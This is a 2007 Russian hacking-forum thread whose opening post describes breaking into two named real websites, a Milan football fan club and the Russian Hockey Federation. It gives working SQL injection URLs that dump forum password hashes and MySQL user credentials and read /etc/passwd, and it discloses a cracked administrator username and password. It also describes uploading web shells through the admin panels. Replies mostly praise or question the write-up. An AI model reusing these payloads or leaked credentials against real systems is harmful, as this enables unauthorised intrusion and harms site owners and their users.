ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Футбол + Хоккей
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Футбол + Хоккей
  #1  
Старый 19.08.2007, 01:43
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow Футбол + Хоккей
Рассмотренны несколько стандартных уязвимостей на интересных и живых сайтах, на которых тусуется народ, а админы не заботятся о безопасности, или заботятся но не до конца...

Начнем, собственно, с футбола, итак, взглянем на сайт оффициального фан-клуба гранда мирового футбола, команды Милан..

www.acmilanfan.ru

немного поизучав сайт и подставляя к параметрам символ ' на предмет иньекции, можно заметить, что места для внедрения существуют, и не в едином количестве. Вобщем, выбираем любой бажный скрипт и действуем:
Цитата:
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,member_login_key,email,leg acy_password),5,6
быстро глядим на версию - она четвертая, и стандартных таблиц типа users не предвидется, но не будем о грустном.. Ведь на сайте стоит форум IPB 2.0.4, но, к сожалению, стандартный префикс ibf_ подходить отказывается. Немного пораскинув мозгами, обнаруживаем, что префикс у базы форума - ipb_, и сразу просматриваем таблицу ipb_members
Цитата:
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,email,legacy_password),5,6 +from+ipb_members/*
итак, мы имеем хеши пользователей форума.
Строго говоря, в форумах IPB 2+ хеши соленые и хранятся в таблице members_converge в полях converge_pass_hash (хеш) и converge_pass_salt (соль), а в поле legacy_password хранятся не соленые хеши, но далеко не всегда, в даннам случае нам повезло. А повезло потому, что хеш одного из админов из-за своей простоты сбручивается и зайдя в админку стандартными средствами, через смайлы, заливается шелл...

И рассмотрим еще один примерчик, имеющий отношение к анонсированному раннее хоккею -

www.fhr.ru

как видно из названия - это Федерация хоккея России, индекс pr у сайта довольно высокий - 5. на сайте есть куча разделов, форум, а обратясь www.domainsdb.net видно, что вместе с fhr.ru хостятся другие сайты sportsrussia.ru, volley.ru, photosport.ru, vancouver-2010.ru и некоторые другие.

Итак, погуляв по сайту находим, куда нам запустить свои шаловливые ручонки. А вынув руки видим что версия mysql на сайте пятая, глядим таблицы:
Цитата:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,table_name), 4,5,6,7,8,9,0,1+from+information_schema.tables+lim it+19,1/*
форум на сайте - phpbb, со стандартым префиксом - phpbb_, смотрим админские записи в таблице phpbb_users
Цитата:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user_id,user name,user_password,user_level),4,5,6,7,8,9,0,1+fro m+phpbb_users+where+user_level=1+limit+0,1/*
опять таки один из трех админов имеет достаточно тривиальный пароль - Max:metallica. А значит доступ в админку у нас есть! идем туда и заливаем шелл одним из способов, которые приводил k1b0rg, благо он все расписал подробно.

По этому сайту остается только добавить что доступ к таблице mysql также присутствует:
Цитата:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user,passwor d),4,5,6,7,8,9,0,1+from+mysql.user/*
А также вовсю открыт читальный зал:
Цитата:
http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,0,1/*
То есть мы имеем полный джентельменский набор

спасибо за внимание, целую ваши мысли

/PS/ Вперед на Россия-Польша!
Последний раз редактировалось Серенький; 19.08.2007 в 10:36..
 
Ответить с цитированием

  #2  
Старый 19.08.2007, 01:56
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию
потресающе.. мегокуль... крутизна....
Терь обьясни зачем:
Создовать отдельную тему, можно было в уже подобниые темы сунуть... или даже в тему про скули....??
Что тут такого "мегокульнохекерского" ?????
 
Ответить с цитированием

  #3  
Старый 19.08.2007, 08:01
Аватар для Feshh
Feshh
Banned
Регистрация: 06.03.2007
Сообщений: 160
Провел на форуме:
2570374

Репутация: 11
Отправить сообщение для Feshh с помощью ICQ
По умолчанию
не трожьте футбол и хоккей! это подло =\
 
Ответить с цитированием

  #4  
Старый 19.08.2007, 10:35
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию
Цитата:
потресающе.. мегокуль... крутизна....
Терь обьясни зачем:
Создовать отдельную тему, можно было в уже подобниые темы сунуть... или даже в тему про скули....??
Что тут такого "мегокульнохекерского" ?????
ну многокульнохеккерским тут и не пахнет, но зато это развернутый пример (еще один..), доведенный до логического конца.
 
Ответить с цитированием

  #5  
Старый 19.08.2007, 11:59
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Да ладно, эта тема получше чем "ПОМОГИТЕ ВЗЛОМАТЬ САЙТ". Нечего наежжать на Серенького.
Хоть он и неправ, запостив тему тут.бывает у всех.

по теме: а права на www.fhr.ru позволяют читать остальные рядом лежащие сайты?
 
Ответить с цитированием

  #6  
Старый 19.08.2007, 12:36
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию
Цитата:
Сообщение от Серенький  
быстро глядим на версию - она четвертая, и стандартных таблиц типа users не предвидется...

а тут можно поподробнее, почему такой вывод?
 
Ответить с цитированием

  #7  
Старый 19.08.2007, 12:48
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию
Самый первый запрос
Код:
http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,member_login_key,email,leg acy_password),5,6
неправильный

Цитата:
а тут можно поподробнее, почему такой вывод?
я думаю, автор просто проверил.
 
Ответить с цитированием

  #8  
Старый 19.08.2007, 12:53
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию
Впринципе таких тем уже море, статьёй не назвать, но и удалять жалко. Считаю, можно было обойтись и без неё.
 
Ответить с цитированием

  #9  
Старый 19.08.2007, 13:12
Аватар для ЛифчиС5СВ
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию
Неплохо. Что-то в этом есть ++
 
Ответить с цитированием

  #10  
Старый 19.08.2007, 14:48
Аватар для Taylorith
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию
прикольно, главное что все подоробно рассписано )) это радует )
молодец!
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Убойный Футбол | Crazy Kickers ~!DoK_tOR!~ Болталка 1 09.03.2007 23:58
Футбол. Чемпионат Мира genOK Болталка 97 24.07.2006 00:37
Футбол. Новости с Чемпионата Мира. _GaLs_ Болталка 1 10.06.2006 12:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ